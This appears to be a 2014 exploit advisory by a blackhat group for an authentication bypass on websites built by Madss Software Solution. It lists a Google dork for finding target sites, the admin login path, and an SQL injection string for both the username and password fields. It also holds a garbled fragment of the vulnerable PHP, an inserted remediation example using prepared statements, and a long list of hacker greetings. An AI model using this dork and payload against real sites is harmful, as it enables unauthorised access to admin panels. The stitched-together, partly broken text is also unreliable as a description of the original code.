#########################################
# Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
############################################

Vulnerable Code

Admin Login
Logout completelly

Administrator

0) { $_SESSION["session_nickname"]=$_POST['username']; $_SESSION["type"]='admin'; ?>
Username
Password

Forgotten password
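
The fragment above sets the admin session variables once a check ending in `0)` passes; the query behind that check is not on the page. As an added example (not the vendor's code and not the advisory author's), here is a PHP login check in which the listed username and password values are handled purely as data. The `admins` table, its columns, the sample account and the in-memory SQLite database are assumptions for illustration.

```php
<?php
// Added example, not the vendor's code. Table, columns and the sample
// account are constructed; in-memory SQLite stands in for the site's database.

function check_admin_login(PDO $db, string $username, string $password): bool
{
    // Bound parameters keep submitted text as data, so quotes and the word
    // "or" inside a field can never become part of the SQL statement.
    $stmt = $db->prepare('SELECT password_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();          // false when no such user

    // Verify against a stored hash rather than matching the password in SQL.
    // The dummy hash keeps the timing similar for unknown usernames.
    static $dummy = null;
    $dummy ??= password_hash('dummy-value', PASSWORD_DEFAULT);
    $ok = password_verify($password, is_string($hash) ? $hash : $dummy);
    return $ok && is_string($hash);
}

function login(PDO $db, array $post): bool
{
    $u = $post['username'] ?? '';
    $p = $post['password'] ?? '';
    if (!is_string($u) || !is_string($p) || !check_admin_login($db, $u, $p)) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);       // fresh session id on privilege change
    }
    // Same session keys as the fragment on the page, set only after verification.
    $_SESSION['session_nickname'] = $u;
    $_SESSION['type'] = 'admin';
    return true;
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$db->prepare('INSERT INTO admins VALUES (?, ?)')
   ->execute(['siteadmin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

$listed = "'=' 'or'";                      // value the advisory gives for both fields
var_dump(login($db, ['username' => $listed, 'password' => $listed]));
var_dump(login($db, ['username' => 'siteadmin', 'password' => 'constructed-sample-pw']));
```

Run it with the PHP CLI and the `pdo_sqlite` extension enabled; the first call is rejected and the second succeeds.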

###################################################
Milad Hacking
We Love Mohammad
Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com
Parcham balast
############################################
Special Tnx To My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th€ mAnger , FaridP30 , AMoK , Azad™ , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES™ , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line
############################################
Never Forget My Top Friends <3
############################################